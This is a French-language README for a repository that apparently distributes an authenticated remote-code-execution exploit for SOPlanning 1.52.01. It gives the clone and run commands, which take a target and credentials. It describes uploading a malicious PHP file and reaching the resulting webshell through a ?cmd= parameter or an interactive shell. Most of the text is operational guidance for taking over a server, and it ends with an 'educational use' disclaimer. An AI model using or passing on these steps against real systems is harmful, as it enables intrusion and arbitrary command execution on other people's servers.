
Exploit pour SOPlanning 1.52.01 (Simple Online Planning Tool) - Exécution de code à distance (RCE) (Authentifié)
Ce dépôt contient un exploit pour une vulnérabilité d'exécution de code à distance (RCE) dans SOPlanning version 1.52.01. L'exploit permet aux utilisateurs authentifiés de téléverser un fichier PHP malveillant et d'exécuter des commandes arbitraires sur le serveur.
requests (Installer avec pip install requests)Cloner ce dépôt :
git clone https://github.com/TheExploiters/SOPlanning-RCE-1.52.01.git
cd SOPlanning-RCE-1.52.01
Exécuter le script d'exploit :
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <cible> -u <utilisateur> -p <mot_de_passe>
Remplacez http://example.com:9090 par l'URL cible, admin par le nom d'utilisateur et admin par le mot de passe.
Après une exécution réussie, accédez au shell web :
Accédez au webshell ici : http://example.com/upload/files/{link_id}/{php_filename}?cmd=<commande>
Pour utiliser le shell interactif, répondez yes lorsque vous y êtes invité.
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <cible> -u <utilisateur> -p <mot_de_passe>
Cet exploit a été rédigé par Ardayfio Samuel Nii Aryee et est fourni à des fins éducatives uniquement. L'auteur et le propriétaire du dépôt ne sont pas responsables de toute utilisation abusive ou de tout dommage causé. Assurez-vous d'avoir une autorisation explicite avant de tester cet exploit sur un système.